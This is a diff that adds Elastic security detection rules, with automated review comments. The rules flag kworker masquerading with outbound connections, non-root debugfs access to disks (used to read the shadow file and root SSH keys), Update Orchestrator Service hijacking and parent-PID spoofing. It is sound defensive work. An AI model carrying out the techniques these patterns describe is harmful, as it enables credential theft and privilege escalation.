{ + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "25d917c4-aa3c-4111-974c-286c0312ff95", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "25d917c4-aa3c-4111-974c-286c0312ff95_3", + "type": "security-rule" +} \ No newline at end of file 
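Review bot: The exclusion list `not destination.ip:(10.0.0.0/8 or ... 169.254.0.0/16 ...)` also drops connections to 169.254.169.254, so a process masquerading as `kworker*` that reaches the cloud instance-metadata service for credentials never reaches the new-terms evaluation; if these hosts run in a cloud, carve that address back out, e.g. `and (destination.ip:169.254.169.254 or not destination.ip:(10.0.0.0/8 or ...))`, or drop the `169.254.0.0/16` entry and rely on `fe80::/10` for link-local noise. The same list excludes all RFC 1918 space but not IPv6 ULA (`fc00::/7`), so the v4 and v6 halves are not equivalent — either add `fc00::/7` or, preferably, state in the description that beaconing to an internal pivot or an attacker-controlled host inside the network is deliberately out of scope. The Command and Control entry carries `"technique": []`; the tactic alone is acceptable when nothing more specific applies, but the sibling reverse-shell rule in this same change maps its outbound connection to T1071 Application Layer Protocol, and reusing it here would keep the package's mappings consistent.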
diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_5.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_5.json new file mode 100644 index 00000000000..d627b0961b9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_5.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the \"disk\" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with \"disk\" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Suspicious DebugFS Root Device Access", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"debugfs\" and process.args : \"/dev/sd*\" and not process.args == \"-R\" and \nnot user.Ext.real.id == \"0\" and not group.Ext.real.id == \"0\"\n", + "references": [ + "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#disk-group" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "2605aa59-29ac-4662-afad-8d86257c7c91", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend 
Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "2605aa59-29ac-4662-afad-8d86257c7c91_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_110.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_110.json new file mode 100644 index 00000000000..c48aef71e9c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_110.json 
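Review bot: The `process.args : "/dev/sd*"` condition in this query only matches SCSI/SATA-style block device names, so the same non-root debugfs access against NVMe (`/dev/nvme*`), virtio (`/dev/vd*`) or Xen (`/dev/xvd*`) disks, which are the default on most cloud instances and VMs, produces no alert even though the `disk`-group condition the description relies on is identical. Widening it to `process.args : ("/dev/sd*", "/dev/nvme*", "/dev/vd*", "/dev/xvd*")` uses the same list syntax the other EQL rules in this commit already use and keeps the rest of the query unchanged. The description and references could also mention that device naming, not only the `disk` group membership, determines coverage.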
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Update Orchestrator Service Hijack", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", + "references": [ + "https://github.com/irsl/CVE-2020-1313" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + 
"version": 110 + }, + "id": "265db8f5-fc73-4d0d-b434-6483b56372e2_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_111.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_111.json new file mode 100644 index 00000000000..83335c658d8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_111.json 
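Review bot: `process.parent.executable : "C:\\Windows\\System32\\svchost.exe"` hard-codes the `C:` drive while every exclusion in the same query uses the `?:` drive wildcard, so hosts with Windows installed on another volume never match the parent condition; `process.parent.executable : "?:\\Windows\\System32\\svchost.exe"` keeps the intent and matches the rest of the query. The identical query is repeated in 265db8f5-fc73-4d0d-b434-6483b56372e2_111.json, which differs only in the `logs-endpoint.events.process-*` index pattern and the version number, so the fix applies to both files. Separately, the investigation guide's step `searching for login events (for example, 4624) to the target host after the registry modification` refers to a registry change this process-start rule does not observe; `after the suspicious child process was spawned` would describe what the rule actually fires on.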
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Update Orchestrator Service Hijack", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", + "references": [ + "https://github.com/irsl/CVE-2020-1313" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + 
"version": 111 + }, + "id": "265db8f5-fc73-4d0d-b434-6483b56372e2_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_7.json b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_7.json new file mode 100644 index 00000000000..b7d8d287c36 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_7.json 
@@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies parent process spoofing used to create an elevated child process. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privileges Elevation via Parent Process PID Spoofing", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid > 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n /* Logon Utilities */\n not (process.parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and\n process.executable : (\"?:\\\\Windows\\\\System32\\\\osk.exe\",\n \"?:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"?:\\\\Windows\\\\System32\\\\Magnify.exe\")) and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true) and \n\n /* AM_Delta_Patch Windows Update */\n not 
(process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\Packages\\\\Preview\\\\*\\\\wuaucltcore.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuaucltcore.exe\", \n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\*\\\\wuaucltcore.exe\")) and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and process.parent.executable == null) and\n\n /* Other third party SW */\n not process.parent.executable :\n (\"?:\\\\Program Files (x86)\\\\HEAT Software\\\\HEAT Remote\\\\HEATRemoteServer.exe\",\n \"?:\\\\Program Files (x86)\\\\VisualCron\\\\VisualCronService.exe\",\n \"?:\\\\Program Files\\\\BinaryDefense\\\\Vision\\\\Agent\\\\bds-vision-agent-app.exe\",\n \"?:\\\\Program Files\\\\Tablet\\\\Wacom\\\\WacomHost.exe\",\n \"?:\\\\Program Files 